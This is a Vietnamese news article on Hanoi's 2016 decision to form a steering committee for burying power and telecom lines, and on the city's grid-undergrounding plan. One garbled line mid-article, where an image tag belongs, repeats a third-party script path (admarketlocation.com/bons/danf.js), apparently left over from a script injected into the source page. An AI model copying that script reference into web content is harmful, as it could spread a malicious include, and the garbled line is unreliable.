Hà Nội: Thành lập Ban Chỉ đạo ngầm hóa đường dây điện lực, viễn thông

Chủ tịch UBND Thành phố Hà Nội Nguyễn Đức Chung vừa ký Quyết định số 3761/QĐ-UBND (ngày 8/7/2016) thành lập Ban Chỉ đạo triển khai công tác ngầm hóa hệ thống đường dây viễn thông và đường dây điện lực trung, hạ áp tại các tuyến phố trên địa bàn, giai đoạn 2016 – 2020.

Theo đó, Ban chỉ đạo do ông Nguyễn Thế Hùng, Phó Chủ tịch UBND Thành phố là Trưởng ban, ông Lê Văn Dục – Giám đốc Sở Xây dựng là Phó Trưởng ban. Các thành viên gồm Giám đốc các Sở: Thông tin và Truyền thông, GTVT, Công Thương, Quy hoạch – Kiến trúc, một số doanh nghiệp liên quan, trong đó có ông Nguyễn Anh Tuấn, Tổng Giám đốc Tổng công ty Điện lực TP. Hà Nội.

andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&www.evn.com.vn/userfile/User/xuantien/images/2016/7/ngamhoaluoidien(1).jpg” alt=”” />Thành phố Hà Nội đang quyết tâm thực hiện ngầm hóa đường dây viễn thông và điện lực

Ban Chỉ đạo có chức năng chỉ đạo toàn diện và thống nhất trong việc thực hiện triển khai công tác hạ ngầm hệ thống đường dây viễn thông và đường dây điện lực trung, hạ áp tại các tuyến phố trên địa bàn thành phố giai đoạn 2016 – 2020.

Ban Chỉ đạo được sử dụng con dấu của UBND Thành phố. Trưởng ban Chỉ đạo được thành lập Tổ công tác giúp việc triển khai công tác hạ ngầm hệ thống đường dây viễn thông và đường dây điện lực trung, hạ áp tại các tuyến phố trên địa bàn thành phố Hà Nội giai đoạn 2016 – 2020.

Nhiệm vụ cụ thể của từng thành viên Ban chỉ đạo, nhiệm vụ của Tổ công tác giúp việc do Trưởng ban Chỉ đạo phân công. Ban chỉ đạo tự giải thể sau khi hoàn thành nhiệm vụ.

Trước đó, tại cuộc họp về Quy hoạch phát triển điện lực thành phố Hà Nội giai đoạn 2016 – 2025, có xét đến năm 2035 – Hợp phần I, Chủ tịch UBND thành phố Nguyễn Đức Chung khẳng định điện là cơ sở hạ tầng phải đi trước để phát triển kinh tế – xã hội của Thành phố.

Quy hoạch phát triển điện lực nhằm định hướng cho việc nâng cấp, cải tạo, mở rộng, phát triển mới lưới điện Thành phố được đồng bộ, hiện đại, đảm bảo độ tin cậy cấp điện, đáp ứng nhu cầu sử dụng điện và phát triển kinh tế – xã hội của Thành phố.

Phương án nâng cấp, cải tạo, mở rộng, phát triển mới lưới điện thành phố Hà Nội được thực hiện trên nguyên tắc: Lưới điện từ vành đai 3 trở vào trung tâm được hạ ngầm toàn bộ; lưới điện từ vành đai 3 đến vành đai 4, ưu tiên phương án hạ ngầm, tại những nơi chưa thể thực hiện hạ ngầm ngay sẽ được thực hiện hạ ngầm phù hợp với tốc độ đô thị hóa.

Thực hiện ngầm hóa đường điện hạ thế đồng bộ với các tuyến đường dây khác để đảm bảo mỹ quan đô thị, hướng tới không còn cột điện trên các tuyến phố. Các trạm biến áp được xây dựng theo công nghệ mới hiện đại, đảm bảo phù hợp với việc xây dựng thành phố xanh, sạch, đẹp.

Tin Liên Quan